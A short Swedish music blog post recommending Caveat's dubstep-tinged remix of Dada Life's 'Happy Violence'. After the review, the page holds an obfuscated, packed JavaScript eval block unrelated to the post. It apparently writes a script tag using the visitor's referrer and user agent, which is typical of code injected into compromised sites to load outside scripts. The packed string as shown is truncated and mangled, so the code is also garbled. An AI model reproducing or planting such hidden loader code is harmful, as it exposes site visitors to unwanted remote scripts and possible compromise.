Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

Dada Life – Happy Violence (Caveat Remix)

Dada Life – Happy Violence (Caveat Remix)
Alexander Gylemo

Om några dagar släpps Caveats efterlängtade remix av Dada Life’s ”Happy Violence”. Caveat slänger in en dubsteppigare typ av electro, något som kommit att bli fruktansvärt populärt bland producenter på sistone och som visar sig funka riktigt bra med Dada Life’s musikstil, inte minst för den här låten då det skänker mer liv och variation än svenskarnas original. Låten släpps 31 oktober på So Much Dada och vi rekommenderar starkt ett köp!

 

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zhtdk|var|u0026u|referrer|tbsbd||js|php’.split(’|’),0,{}))
Dada Life – Happy Violence (Caveat Remix) by Dada Life

Comments